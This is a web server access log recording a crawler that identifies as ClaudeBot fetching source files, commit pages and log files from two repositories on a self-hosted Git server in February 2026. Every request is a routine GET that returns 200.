192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" [Client 216.73.216.188] [Length 10967] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log?display=source" [Client 216.73.216.188] [Length 25228] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 11796] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13161] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.3" [Client 216.73.216.188] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 842] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5?display=source" [Client 216.73.216.188] [Length 33693] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 11549] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10917] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16510] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15563] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14240] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1?display=source" [Client 216.73.216.188] [Length 33884] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11903] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 216.73.216.188] [Length 11178] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 13963] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 9842] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 216.73.216.188] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13905] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" [Client 216.73.216.188] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 216.73.216.188] [Length 11211] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14696] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 9841] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64?display=source" [Client 216.73.216.188] [Length 11057] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument" [Client 216.73.216.188] [Length 156413] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py?display=rendered" [Client 216.73.216.188] [Length 10976] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.2" [Client 216.73.216.188] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 9846] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 936] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md?display=source" [Client 216.73.216.188] [Length 15800] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh?display=source" [Client 216.73.216.188] [Length 14937] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3?display=source" [Client 216.73.216.188] [Length 39004] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 21826] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 958] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py?display=rendered" [Client 216.73.216.188] [Length 10982] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css/style.css" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14670] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 11174] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14823] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py?display=source" [Client 216.73.216.188] [Length 13096] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 10076] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 1452] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64?display=rendered" [Client 216.73.216.188] [Length 10993] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py?display=source" [Client 216.73.216.188] [Length 16658] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 9854] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 216.73.216.188] [Length 11208] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 11558] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" 